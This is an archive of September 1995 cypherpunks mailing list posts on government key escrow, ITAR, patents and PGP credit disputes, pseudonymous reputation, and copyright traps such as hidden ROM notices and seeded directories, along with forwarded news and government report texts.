> anyone ever heard of this being done? 

This "man-in-the-middle attack" is called, variously, arbitrage or
capitalism. :) You've rediscovered Marx' surplus value theory of
labor. (shh, don't say any more, or someone will say we're using
language wrong.)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFPCmH3YhjZY3fMNAQEzTAP/dJFeg828BVuqS06deN15ILrX/13q2iSa
seMCWXJMxOmRPS+oS7vbJtJ8jIhEJVlg+p9Un/rstD4QM7q6PRgKw9daq5LMav3y
S+i0sYKEBnMmF+q5Ocm6EshHCAYs9sQOkM7hxr0rq0vhX3onFlpAIVBmUhz4BjtX
YtoSpLWQ62U=
=i8Zt
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 10 Sep 95 19:07:44 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: question about reputation
In-Reply-To: <Pine.SUN.3.91.950910164221.8377C-100000@eskimo.com>
Message-ID: <9509110207.AA25237@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack writes:
# Good question, but a quick modification allows for effective
# bootstrapping.  If I want to start consulting for Amalgameted
# Consolodated, I can offer them a 10 free questions deal to bootstrap
# things with.  Mallet can only cheat if my offer was broadcast.

Wei Dai writes:
> This scheme doesn't quite work.  (Let's call Amalgameted Bob, to keep
> names short.)  Bob can create a new, unlinkable pseudonym and give the same
> offer to Carol under the new pseudonym.  Then, Bob acts as Mallet and
> passes messages back and forth between Alice and Carol.  

If all Alice's prospective customers are also resellers on the side, then I
agree that she has a problem. But how realistic is a market scenario in which
a new supplier cannot positively identify some legitimate end consumers of a
product or service ?  (I'm ignoring cases in which the market for the
product or service is only just being forged.)  This strikes me as rather
implausible, although I don't claim to have devoted a great deal of thought
to it.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Sun, 10 Sep 95 13:10:58 PDT
To: cypherpunks@toad.com
Subject: Re: Bizdos citizenship?
Message-ID: <v01510100ac78c76f2125@[193.74.217.15]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>In correspondence with someone outside the US regarding ITAR regulations,
the remark was made that Jim Bizdos was Greek and not a U.S. citizen.  Is
this statement in the same class as an Elvis sighting?  Or if it is true,
what impact would ITAR have on foreign nationals working for a US company
involved with export restricted crypto?
>
>Please don't get carried away and turn this into a Net rumor.  I'm just
curious if anyone on the list can confirm or deny the citizenship comment.

Jim Bidzos is a US Permanent Resident Alien and Greek citizen.  He has a
Green Card.  It doesn't have any ITAR impact, since the ITAR term 'Foreign
Person' doesn't include Green Carded Resident Aliens.

It probably wouldn't have any impact anyway, since he's a business weenie,
and not a software weenie.  Now, if he had a _programmer_ that wasn't a US
Citizen, that would be a-whole-nother kettle of fish.

He's previously stated that he would become a US Citizen, if it were not for
the fact that Greece would require him to give up his Greek (and hence his
EC) citizenship.  See Simson Garfinkle's book on PGP for more details.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFMZFI4k1+54BopBAQGK7gP+Oq+FjqjCeQziC16Ryq64i1tXMAhV/jaX
86TBumss/GPpaVfLGtDS3FZARK9eTo4gVPTfABtvIa/u6QzZGL9zCT5z5nWT5QJ4
Koj5jnGsnNpXx3YGa1bJfZOI4ctkRovPWpyPa4jWOEooJz5UbvCCwGW/YoYMlvCs
sQ//Qs7uDPs=
=ARLj
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Sun, 10 Sep 95 19:26:36 PDT
To: cypherpunks@toad.com
Subject: Re: not a flame please read and think about this
Message-ID: <v01520c02ac794e45100d@[199.227.2.141]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Rich said
>>> even phil zimmerman is selling the rights to pgp. what about all the
>>> people who contributed code (like me) ... . ask phil
>>> about me and when i asked about sharing profits from the code i
>>> conrtibuted. also about the deal with r.f...
>
>Mr/Ms. Anonymous is lying.  His/her name appears nowhere in the credits,
>and his/her code appears nowhere in any PGP release.  Don't waste any
>neurons on it.

Let Anonymous have a share of prz's legal bills as well.  No matter how much
Phil is getting from licensing, somehow I doubt he is netting a profit...


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMFOfeGGnwFiC3O2NAQHedwf/T9QOEUBdX7DZx1ygdk4/Us2wmiYQiDUG
PZxht4G+66aYO/7IYwxIES9ksAvCP/vZJ14a55Lc+NJABFnMe/eJrbXmNSjyGdFP
hoHUXGWv3BJDpx6QvhapDFoAsG0b0KgDQMpG2/6s9VPKsDoNNioUDzvpV4lh7fNh
RhjO1yA1dYHVcW2ihICByw/e43aU35xhrDhzFm/9ExtVT2STMGvnTso3Pgj/oAqa
Szbj2AzKp6NmI+BdfWrZmdFcFdji8toQ5AtUmBY1gBU1DbDZzdV8BiDYnMJfbcyH
TIKxU4xPWpXi3WjfE37CsPnxGv+ASylHuCUpanldKaz3y03hRawIBQ==
=3Pw7
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Sun, 10 Sep 95 21:43:09 PDT
To: cypherpunks@toad.com
Subject: Re: Document Fingerprinting
Message-ID: <199509110443.WAA00476@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Will French:

>  Sounds like a disaster to me, unless it can be done
>automatically, by a proven-correct program.  I used to use
>commercial compilers that (at least claimed to) put their
>"stamp" on the assembly code they generated, so they could sue
>if you released a product without having a license for the
>compiler.  Bugs are bad enough as it is; we don't need extra
>ones that only show up in some copies!

I seem to recall a lawsuit where somebody like Tandy was suing
somebody else, claiming they copied the computer's rom code.

As proof they pulled out the competitors computer, pressed a
certain key combination, and the Tandy copyright flashed up on
the screen. As I also recall, they LOST the suit believe it or
not...

Anybody heard of this? Cerca 1988-1991 I believe. Sure shows
what a slick lawyer can get you out of...

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMFO+acLa+QKZS485AQFNCQL+L/HtUtC//QAi8II8Ktf7bZjSt3YRdmBf
/zNieoiM5buZDAlC/GHR4bw4RJl5qWbY33r8QB4akR4b108Fvf0BxkUCgPmdI95f
f+MHqxcRLfwgcoj0XiwxMrR9pQyJEv4B
=8myc
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 10 Sep 95 22:57:31 PDT
To: cypherpunks@toad.com
Subject: Re: GAK Advisory Board
Message-ID: <ac7917e105021004c095@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to "Anonymous" for sending this to us. I visited the site,
http://csrc.ncsl.nist.gov/csspab, and there seem to be some interesting
things there.

At 4:50 AM 9/11/95, Anonymous wrote:

>Status of Key Escrow Initiative
>
>Mr. Steve Walker, Trusted Information Systems (TIS),
>briefed the Board on the status of Commercial Key Escrow
>(CKE).  He said, with regard to application vendors, TIS
...
>Mr. Walker said the advantages of CKE for government
>interests is that if the TIS CKE system were to become
>widely used throughout the private sector and government
>communities, law enforcement, national security and
>private sector interests would be preserved.

If Data Recovery Centers are indeed completely choosable by the users, as
certain statements by TIS folks have asserted, then how would "law
enforcement" and "national security" interests be "preserved"?

(I can tell you that BlackNet won't be using any government-approved DRCs.
Nor will Kizer Sose be using any registered and licensed DRCs. If people
are free to pick DRCs--the only option a free society can support--the
results are obvious.)

Note also the emphasis on "throughout the private sector and government
communities" as leading to this protection of law enforcement and national
security interests...no mention of this being mainly for export
issues...the focus seems to be on domestic use of CKE, with the "law
enforcement" and "national security" needs "preserved." Sounds ominous to
me.

I've used "Tim's Really Flaky Commercial Key Escrow Service" as a
placeholder for the kind of truly voluntary DRCs many of us would insist
on. (Other examples: a computer on my LAN, the bit bucket, my neighbor, my
lawyer, my bank in Lichtenstein, etc. Some of these are actually what I
would want to use. I can imagine interesting situations wherein
attorney-client privilege blocks access to the keys.)

So, what's the story? Is Steve Walker of TIS supporting the kind of
completely voluntary CKE system that Carl Ellison has advocated? Or a
mandatory system?

(A third imaginable possibility is "a system which is so universally
popular that it becomes universally used"...unlikely in the extreme, as I
know of at least a few people who won't use it, and expect others to bypass
it when they learn what the Feds can do. But I expect that the advocates of
the mandatory option will cite this possibility, as a way of sugar-coating
the proposal. Then, if this option fails (to preserve the Government's
interests!), watch for registration of DRCs.)

I met Steve Walker once, at the CFP Conference, and he seemed genuinely
interested in selling to citizens a voluntary system. But his comments to
the Privacy Advisory Board seem to imply a CKE system that would not be
completely voluntary in the operation (licensing, registering. auditing) of
Data Recovery Centers.

If this is the case, then alternatives to the TIS system will likely gain
more adherents from folks like us.

>Mr. Walker said that TIS has filed for patent protection
>for its Software Key Escrow (Clipper equivalent) and CKE
>systems including the DRC and application software
>approaches.  TIS is prepared to license its CKE system
>and software applications technology to any software or
>hardware vendor under very favorable licensing terms.
>TIS is also prepared to license its DRC system and
>technology to qualified DRC operators and vendors under
>similarly favorable licensing terms.  (See Reference
>#13).

The TIS system may be patented, but it seems to me that the older ideas of
Shamir secret sharing are not. And even simpler schemes of sealing parts of
keys in several envelopes... (My point is that older ideas of using crypto
in conjunction with emergency recovery systems are still usable, and have
been talked about for many years, long before the TIS disclosures.)

I hope it doesn't come to this. I hope TIS releases or licenses on very
general terms, with no government control of the DRCs. If not, I predict
their system will be subject to derision, and worse.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Sun, 10 Sep 95 20:43:52 PDT
To: cypherpunks@toad.com
Subject: GAK/weak crypto rationale?
Message-ID: <Pine.3.89.9509102345.F11334-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



After reviewing the reports filed by our intrepid reporters in the field 
about the NIST meetings, I am left with a puzzling thought:  Why are the 
NSA and the FBI so very keen on GAK and weak crypto?  There was posted on 
this list some time back a statistic about the number of wiretaps and 
intercepts requested and authorized in the past year.  As I recall, the 
number was quite small - around 12K [?].  Someone had found this out 
through an FOIA request, perhaps, (my recollection of it is poor). It was 
not a large number, anyway.  I must conclude that the actual number of 
intercepts is much, much larger than they are saying, and that they must 
be getting what they perceive to be good intel from all this snooping.

Otherwise, why would the NSA and the FBI be so gung-ho on this, when 
everyone is telling them it is bad for US software business, abhorrent to 
privacy rights, unenforceable, and just plain bone-headed in these new 
international geodesic network times?

--
PJ
p.s. -thanks for the reports, well done. I think most of the list readers 
are very appreciative of the coverage provided on Crypto95 and NIST sham.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Sun, 10 Sep 95 15:52:51 PDT
To: na116512@anon.penet.fi
Subject: Re: not a flame please read and think about this
Message-ID: <20619.9509102252@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Anon writes:
> i know this is unpopular but i wish someone would respond the the
> points rather than flaming me.

Fair enough, try these...

> wei dai patents algorithms - for microsoft!!!!. that should
> fucking help us a lot. whos he gonna sue first?

Shame it got patented, one more patent.  Patents are a mess, ick!

> hey i think ill patent xor!!!! and give the patent to the nsa!!!

I was kind of wandering if it would be necessary to patent something
just to ensure someone else did patent *your* idea, if you came up
with one.

Or can you publish, and then say that's prior art, so no one else can
go patent your idea.

Otherwise it would be kind of cool for cpunks to be holding a few
patents themselves, allowing free use, just to stop some "hmm lets see
what we can patent this week", and "lets patent their work cos they
haven't yet" types stealing stuff, and disabling a whole section of
work.

Chaum's got lots of nice technology, but his patenting and $150k price
tag might not be doing him favours.  Unless he really does manage to
pull some big banks or something.  I reckon the netscape model is a
good one, give stuff away to the educational lot, sell things cheap,
have free demo versions, get the standard first before charging a
ransom.

Guess he knows what he's doing tho.  I hope so for the sake of the
future of anon ecash.  Be a shame if some of these lame things which
claim to be ecash but are really checks with full audit logs, or
credit card transactions in disguise become the defacto standard.

Problem is no one stands much of a chance unless a radically new
method of ecash can be had, he has his patents cover blind sigs?  I
guess they don't cover blind sigs in general because Brands has
applied for patents on his improved blinding techniques.

> according to sci.crypt mat blaze can prove that clipper has no back
> door. right. that sure helps us. david sternlights new hero.

That interpretation was argued.  But it's interesting anyway, if a
MKCS is equivalent to a PK, and PKs are computationally expensive, and
clipper chips are cheap, well hey maybe that's what it does mean, and
they wouldn't want to have a weak backdoor in the sense of a weak
algorithm, as it may come to light some day, similarly eventually the
thing would surely get reverse-engineered, they wouldn't want to be
caught out, I'd have thought.  They don't need that for a backdoor,
they've already got the front door - a copy of all the keys.

> pat farrel signs up with the nsa to make the key escrow rules easier
> for us morons to understand. hey thanks. maybe theyll give you a
> nicer room in the concentration kamp.

I found it real informative to have a first hand report of what was
going on.  I don't see anything wrong with going along to the meeting
just to throw your spanner in the works, sounds like the govt types
didn't have an easy time of it.

They're clearly asking for things which are unacceptable to industry,
and cpunks alike.

A lot of the stuff Pat wrote up about the NIST meeting sounded like
the majority of the attenders were trying to convert a government
request for GAK into a CKE discussion.  Would be a cool switch.

> a whole shitload of socalled cypherpunks jumping over each other to
> help and defend him.

Well you did ask :-)

> brian davis trys to convinice us that key escrow isnt so bad (who
> signs your paycheck davie?????)

Not sure that there was a motive attached (I could be wrong?), seemed
like a provoking question to me.  Got some interesting replies.

> that guy from rand corp tells us words of wisdom from robert morris
> the nsa guy as if we should write them down and pray three times a day
> to them.

I always kind of like to hear what ex-NSA types are reported as
saying, it's quite fun because you never know if they are still on the
payroll and feeding you a story for ulterior motives, or if they are
making a statement which they think is to their advantage to scare
you, or if they really are ex-NSA and are just saying what they can,
being helpful, without getting in hot water with the secrecy stuff
they have to agree to.

> carl elison designs key escrow for tis and acts like hes one of us.

Designs CKE, CKE is fine by me, it's voluntary, and just the software
equivalent of having a spare key for your own use.

GAK is the evil one.

> bruce schneier is copyrighting crypt programs and
> threatining to sue people who use it.

Let's tackle one thing at a time ok?

Lots of folks would agree patents are bad news, at least the state of
them in the US with idiots patenting XORed cursors, etc.

Clost to unanimous on GAK being evil incarnate.

Copyrights, well GPL, ILF, RMS says programs should be free.

Indeed long term copyrights look like endangered species, if crypto
anarchy has it's say.

But it's a tricky one because a lot of people make their money writing
applications, and they don't want to vote themselves out of a job.

If crypto anarchy long term proves copyrights to be outmoded, well
the market will change.

> even phil zimmerman is selling the rights to pgp. what about all the
> people who contributed code (like me). not a dime for us because
> phil is famous and your not alowed to say anythingn bad about
> him. sorry i forgot phil is god.  no one dares to complain. ask phil
> about me and when i asked about sharing profits from the code i
> conrtibuted. also about the deal with r.f...

Wouldn't be much to go around if all the contributers got a share,
there were lots of contributers.  He's the one taking the rap anyway,
and the guy who made it all possible.

> lets get back to being punks. 

Cpunks write code, so lets do it!

And lobby, and analyse govt polices, and educate about crypto, and
attend govt run white-washes (NIST etc) to register their protest.

> fuck these traitors

Nah.  Crypto anarchy and all that, it's an anarchy, you ain't going to
find 2 cpunks with exact identical view points on all topics.  Most of
the people you complained of to my understanding have done a lot of
work for the cpunk causes, as well as their implied copyright/patent
crimes.

> do crypto and fuck the nsa.

Sounds cool to me.

So whats the plan of action?  People have different ideas, but they're
all fighting for the same cause.  Down with GAK, being the #1 target
at the moment.  Privacy from governments, scaling down of hugely
bloated governments, malign cancerous growths that they are becoming
these days, freedom is what it's all about.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 10 Sep 95 15:20:25 PDT
To: cypherpunks@toad.com
Subject: Nice Guys
Message-ID: <199509102220.AAA25494@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



   NY Times, Sept. 10, 1995.

   The Decline of the Nice-Guy Quotient

   By Daniel Goleman


   Contrary to conventional wisdom, nice guys do finish first.
   The trouble is, nice guys are harder and harder to find.

   Amid the agonizing over standardized intelligence tests
   comes a new problem to worry about. Psychologists seeking
   a broader measure of intelligence, one that accounts for
   the personality traits that seem to predict success better
   than IQ alone, have discovered that a newly minted virtue
   they call "emotional intelligence" is declining as well.

   A recent study done at Bell Laboratories the high-tech
   think tank near Princeton N.J., found that the most valued
   and productive engineers -- at least among electrical
   engineers working in teams of up to 150 people -- were not
   those with the highest IQs, the highest academic
   credentials or the best scores on achievement tests.

   Instead, the stars were those whose congeniality put them
   at the heart of the informal communication networks that
   would spring up during times of crisis or innovation.

   When these likeable engineers hit a snag and E-mailed for
   help, they got an answer instantly; when others less gifted
   in interpersonal realms sent similar messages, they
   sometimes waited days or weeks for a reply.

   The standouts excelled in rapport, empathy, cooperation,
   persuasion and the ability to build consensus among people.

   The new term for these traits is emotional intelligence,
   which, in addition to the social graces, includes the
   ability to read one's own feelings, to control one's own
   impulses and anger, to calm oneself down and to maintain
   resolve and hope in the face of setbacks.

   To predict the success of a financial analyst or
   geophysicist, IQ is still crucial. But within a pool of
   high-lQ people, those with high emotional intelligence will
   have an extra competitive edge.

   Emotional intelligence, like self-knowledge and personal
   charisma, has long been seen as ineffable, more the stuff
   of poets and philosophers than psychometricians. And yet,
   despite all that, the measuring has begun.

   In the mid-1970s, and again in the late 1980s, Thomas
   Achenbach, a psychologist at the University of Vermont, had
   thousands of American children assessed by their parents
   and teachers on a behavioral checklist. He found that over
   the course of that decade and a half, America's children,
   on average, had become more anxious and depressed, more
   impulsive and mean, more demanding and disobedient, more
   hot-tempered and aggressive -- and not just in beleaguered
   urban neighborhoods.

   The study found growing emotional deficits even among the
   children of the wealthiest suburbs. Although the scores
   were worst for the poorest children, the rate of decline
   was the same for all, privileged and impoverished alike.

   Apparently, students continue to be receptive even into
   their teen years. Neuroscientists have found that the
   centers in the prefrontal lobes that control emotional
   impulse are among the last parts of the brain to reach full
   maturity, sometime in mid- to late adolescence.

   Now, at last, from the emotional literacy front there is
   some promising news: Children in the courses show marked
   improvements in the ability to control their impulses, show
   empathy, cooperate with others, manage anger and anxiety,
   focus on a task, pursue goals and resolve conflicts.
   Delinquency, fights and drug use drop.

   And there is an added bonus: achievement test scores rise
   too.

------










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 11 Sep 95 00:35:31 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: Big machine ordered from Intel
Message-ID: <199509110735.AAA01275@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:40 AM 9/8/95 -0700, Patrick wrote:
>How much you want to bet that a first copy goes to virginia?
>> NY Times, Sept 8, 1995.
>> Intel Wins Contract to Develop World's Fastest
>> Supercomputer
>> San Francisco, Sept. 7 -- The Intel Corporation said
>> today that it had won a a contract from the Department of
>> Energy to develop what it called the world's fastest
>> supercomputer.
...
>> The machine, to be built at an estimated cost of $45
>> million, would use 9,000 of Intel's forthcoming P6
>> microprocessors linked in a configuration known as

Not likely.  It's the kind of machine Sandia _would_ use, especially
since they seem to be getting good support for nuclear-related
boondoggles even after the demise of the Cold War, and it's
also the kind of thing they could use for commercial applications
if they lose their nuclear funding, or use to say "But we _need_
to keep funding this program, we haven't yet gotten our money's
worth out of this big expensive computer", etc.
Also, the cost is roughly $5K/processor, which is probably more
than you'd need to build a MPP key-cracker, which doesn't need
as much interaction between processors.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: damion.furi@the-matrix.com (DAMION FURI)
Date: Mon, 11 Sep 95 02:11:24 PDT
To: cypherpunks@toad.com
Subject: question about reputa
In-Reply-To: <8B0D52F.000504EADD.uuout@the-matrix.com>
Message-ID: <8B0E027.000504EC28.uuout@the-matrix.com>
MIME-Version: 1.0
Content-Type: text/plain



F|Adam Shostack writes:
 |# Good question, but a quick modification allows for effective
 |# bootstrapping.  If I want to start consulting for Amalgameted
 |# Consolodated, I can offer them a 10 free questions deal to bootstrap
 |# things with.  Mallet can only cheat if my offer was broadcast.
F|Wei Dai writes:
 |> This scheme doesn't quite work.  (Let's call Amalgameted Bob, to keep
 |> names short.)  Bob can create a new, unlinkable pseudonym and give the same
 |> offer to Carol under the new pseudonym.  Then, Bob acts as Mallet and
 |> passes messages back and forth between Alice and Carol.
F|If all Alice's prospective customers are also resellers on the side, then I
 |agree that she has a problem. But how realistic is a market scenario in which
 |a new supplier cannot positively identify some legitimate end consumers of a
 |product or service ?  (I'm ignoring cases in which the market for the
 |product or service is only just being forged.)  This strikes me as rather
 |implausible, although I don't claim to have devoted a great deal of thought
 |to it.

        Hey, Wei, you overlooked something rather simple: suppose
        Alice wasn't any good?  Or suppose she was good, in general,
        but came up wrong at a bad time?  Whereas she might have
        corrected it in time if it had been her client and she had
        direct access, Mallet gets hit broadside out of ignorance--
        and the resulting delay from the extra link in the chain
        could easily be enough to ruin him.


   :----------:----------:----------:----------:----------:----------:-----
   : furi@the-matrix.com |   pgp-public-key@demon.co.uk   | LIVE LION ALERT
   : 2.6.2 1024/C1225CE1 | 38 11 7C 59 FB F3 7C C0  F7 E9 67 1F AF B8 2D 94
                 PGP: When it's none of their damned business.
---
  SPEED 2.00 #2640  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rmtodd@servalan.servalan.com (Richard Todd)
Date: Mon, 11 Sep 95 00:28:30 PDT
To: cypherpunks@toad.com
Subject: Re: Document Fingerprinting
In-Reply-To: <199509110443.WAA00476@wero.byu.edu>
Message-ID: <m0ss2Mm-00078PC@servalan.servalan.com>
MIME-Version: 1.0
Content-Type: text/plain


In servalan.mailinglist.cypherpunks you write:
>I seem to recall a lawsuit where somebody like Tandy was suing
>somebody else, claiming they copied the computer's rom code.

>As proof they pulled out the competitors computer, pressed a
>certain key combination, and the Tandy copyright flashed up on
>the screen. As I also recall, they LOST the suit believe it or
>not...

Dunno about that one, but there was one where Tandy/Radio Shack was being
sued by the guy (Randy Cook) who originally wrote TRSDOS 2.1, claiming 
RS owed him royalties (which they weren't paying) because the current 
shipping TRSDOS for the Mod I at the time (v2.3) still had Randy's code.
RS claimed otherwise.  Randy Cook showed that if you held down two keys while
booting TRSDOS 2.3, (either the '2' and '4' keys, or '2' and '6', I forget
which), instead of going into the OS the machine would show a nice 
copyright screen, including "Copyright (C) Randy Cook".  Oops.  Tandy/RS had
to pay up.  (For those who still have a working Model I and a copy of TRSDOS
from that era, the message is located in one of the sectors on Track 0; it's
fairly easy to spot with a sector editor like SUPERZAP...)

There was also the famous Apple/Franklin case, where Apple showed that
Franklin's Apple II clones contained the original Apple II ROMs, right down
to the copyright notice.  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sun, 10 Sep 95 23:30:38 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Internet commerce mtg, Denver
Message-ID: <v02130500ac78bfb2b964@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 13:00 9/9/95, Vladimir Z. Nuri wrote:
>the rep told me something interesting: he said that every
>Bell phone book is actually "seeded" with dummy names
>so they can detect copyright infringers. if you come out
>with a business directory, these Bells will just scan for
>the fake names that they have inserted into their own listings.
>if they find them, supposedly they can show them to a copyright
>judge and he will immediately close down your operation and
>fine you, almost no questions asked. I didn't know how much
>of this really happens (the legal stuff sounded questionable
>to me) but it is an interesting "real world" instance of
>copyright terrorism prevention that the "information liberation
>front" would have to contend with.

This is standard practice with (snailmail) mailing lists. When you buy a
ome-time-use mailing list, there are always names in there to detect resale
or reuse of the list. There are people whose job it is to scan the junk
mail they get and report when they get mail to specifically encoded names
(which would indicate that the mailing list has been reused or merged with
another list without permission).

I see nothing wrong with doing something similar with Phone Books (and I
seem to remember reading that has been done in the past).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 10 Sep 95 20:23:55 PDT
To: cypherpunks@toad.com
Subject: Security Policy Documents
Message-ID: <199509110323.FAA01214@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



From: URL: http://csrc.ncsl.nist.gov/secplcy/


   Computer Security Resource Clearinghouse WWW Server
     
_________________________________________________________________

   
                           SECURITY POLICY DOCUMENTS
   
   These are computer security policy documents, primarily from 
the
   Department of Commerce, and the Office of Management and 
Budget.
   
   [?] Search Security Policy Documents
   
   a130app3.txt [62983 bytes]
           1995-03-29 Proposed Revision of OMB Circular No. 
A-130
          Appendix III
          
   doj-fg.zip [172668 bytes]
           1994-07-04 "Searching and Seizing Computers," U.S. 
Dept. of
          Justice, Federal Guidelines, July 1994 (zipped 
WordPerfect
          file)
          
   omba130.txt [80748 bytes]
           1994-06-06 Office Management and Budget
          
   cryptpol.wp [68689 bytes]
           1994-03-01 Cryptography: Policy and Technology 
Trends
          
   doc-copy.txt [4600 bytes]
           1993-11-23 Department of Commerce's Software 
Copyright Policy
          
   doc-poli.txt [86434 bytes]
           1993-11-23 Department of Commerce's Chapter 10 of 
the DOC IT
          Management Handbook, which contains the IT Security 
policies
          for the Dept.
          
   doc-man.txt [253689 bytes]
           1993-11-19 Department of Commerce beginning sections 
of the
          DOC "Information Technology Security Manual"
          
   a130.zip [26986 bytes]
           1992-06-08 Proposed Revision to OMB Circular A-130
          
   sec_2315.txt [2150 bytes]
           1992-02-27 Sect. 2315 of U.S. Code Title 10
          
   omb_a130.txt [97630 bytes]
           1992-02-27 OMB Circular A-130, "Management of 
Federal
          Information Resources"
          
   opm_plcy.txt [12951 bytes]
           1992-02-27 Computer Security Training Policy
          
   csa_87.txt [153493 bytes]
           1992-02-27 Computer Security Act of 1987
          
   rfc1244.txt [253471 bytes]
           1991-11-08 Very good summary of site security 
policies






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Mon, 11 Sep 95 05:50:46 PDT
To: cypherpunks@toad.com
Subject: Information Security and Privacy in Network Environments (fwd)
Message-ID: <199509111247.FAA00620@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



    This was posted to another list today.  It purports to be fresh
    although the file at the Web site is dated 11 August.
    Hope this is not redundant.
> *
> U.S. CONGRESS
> OFFICE OF TECHNOLOGY ASSESSMENT
> Washington, DC  20510
> *
> 
> *
> ISSUE UPDATE ON INFORMATION SECURITY AND
> PRIVACY IN NETWORK ENVIRONMENTS
> *
> 
> The OTA background paper "Issue Update on Information
> Security and Privacy in Network Environments" is now
> available.  Ordering information and details about
> electronic access are at the end of this file.
> 
> INFORMATION SECURITY AND PRIVACY ISSUES IN NETWORK
> ENVIRONMENTS REQUIRE CONGRESSIONAL ATTENTION
> 
> Transition to a society that depends on electronic
> information and network connectivity brings new concerns for
> information security and effective protection of privacy.
> The new focus must be on safeguarding information as it is
> processed, stored, and transmitted, rather than on
> "document" security or "computer" security.  In the
> networked society, responsibility for information security
> is shifting to the end users.
> 
> In a background paper released today the congressional
> Office of Technology Assessment (OTA) finds an increasingly
> urgent need for timely congressional attention to these
> concerns.
> 
> OTA has updated, at the request of the Senate Committee on
> Governmental Affairs, some key issues identified in its 1994
> report on information security and privacy.  OTA found that
> recent and ongoing events are relevant to congressional
> consideration of national cryptography policy and
> government-wide guidance on safeguarding unclassified
> information in federal agencies.
> 
> OTA stresses the need for openness, oversight, and public
> accountability--given the broad public and business impacts
> of these policies--throughout the discussion of possible
> congressional actions.  In OTA's view, two key questions
> underlie consideration of policy options.  The first is: How
> will the nation develop and maintain the balance among
> traditional "national security" and law-enforcement
> objectives and other aspects of the public interest, such as
> economic vitality, civil liberties, and open government?
> The second is: What are the costs of government efforts to
> control cryptography and who will bear them?
> 
> None of the cost estimates will be easy to make, warns OTA.
> Ultimately, however, these costs are all borne by the
> public, whether in the form of taxes, product prices, or
> foregone economic opportunities and earnings.
> 
> OTA emphasizes that congressional oversight of government
> information security and privacy protection is of utmost
> importance in the present time of government reform and
> organizational streamlining.  The security of unclassified
> information has not been a top management priority;
> downsizing can incur additional information security and
> privacy risks.  Similarly, says OTA, management must ensure
> integration of safeguards when streamlining agency
> operations and modernizing information systems
> 
> OTA finds momentum building for government-wide consolidation
> of information-security responsibilities.  Congress must
> resolve the overarching issue of where federal authority for
> safeguarding unclassified information in the civilian
> agencies should reside and, therefore, what needs
> to be done concerning the substance and implementation of
> the Computer Security Act of 1987, says OTA.  If Congress retains the
> general premise of the act--that responsibility for
> unclassified information security in the civilian agencies
> should not reside within the defense/intelligence
> community--then vigilant oversight and clear direction will
> be needed, says OTA.
> 
> Timely and continuing congressional oversight of
> cryptography policies is crucial, says OTA.  Cryptography, a
> fundamental safeguard, can preserve the confidentiality of
> messages and files, or provide "digital signatures" that
> will help speed the way to electronic commerce.  Non-
> governmental markets for cryptography-based safeguards have
